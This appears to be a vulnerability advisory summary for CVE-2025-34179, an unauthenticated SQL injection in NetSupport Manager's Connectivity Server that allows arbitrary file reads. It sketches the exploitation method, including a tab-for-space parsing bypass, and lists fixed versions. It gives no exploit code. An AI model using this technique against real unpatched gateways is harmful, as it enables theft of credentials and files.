CVE-2025-34179

Vulnerability

Overview NetSupport Manager versions prior to 14.12.0001 contain an unauthenticated SQL injection vulnerability in the Connectivity Server (Gateway) component. The server processes each incoming HTTPS request by constructing an unsanitized SQLite query against the FileLinks table in gateway.db. The URI path is directly concatenated into the query, allowing an attacker to inject arbitrary SQL commands [1][2].

Exploitation

An attacker can send a crafted HTTP request to the Gateway server (typically exposed on TCP/443) without any authentication. By injecting SQL through the LinkName/URI value, the attacker can manipulate the FileName field returned by the query. The server then reads the file specified by the attacker-controlled FileName from disk and returns its contents in the HTTP response. The researcher notes that spaces in the URI must be replaced with tabs to bypass simple parsing [2].

Impact

Successful exploitation leads to arbitrary local file disclosure. The attacker can read any file the Gateway process has access to, potentially exposing sensitive data such as configuration files, credentials, or other system information. Additionally, the SQL injection can be used to write arbitrary SQLite databases, which under specific circumstances (e.g., a PHP-enabled web server) could lead to remote code execution [2].

Mitigation

NetSupport has released version 14.12.0001 which fixes this vulnerability. Users are advised to update all Gateway, Control, and Client components to the latest version. For those running older versions (12.70–12.80 or 14.00–14.10), specific patches (12.80.0017 and 14.10.0007) are available [1]. The vulnerability was reported by researcher Chris Leech and coordinated through VulnCheck [2][3].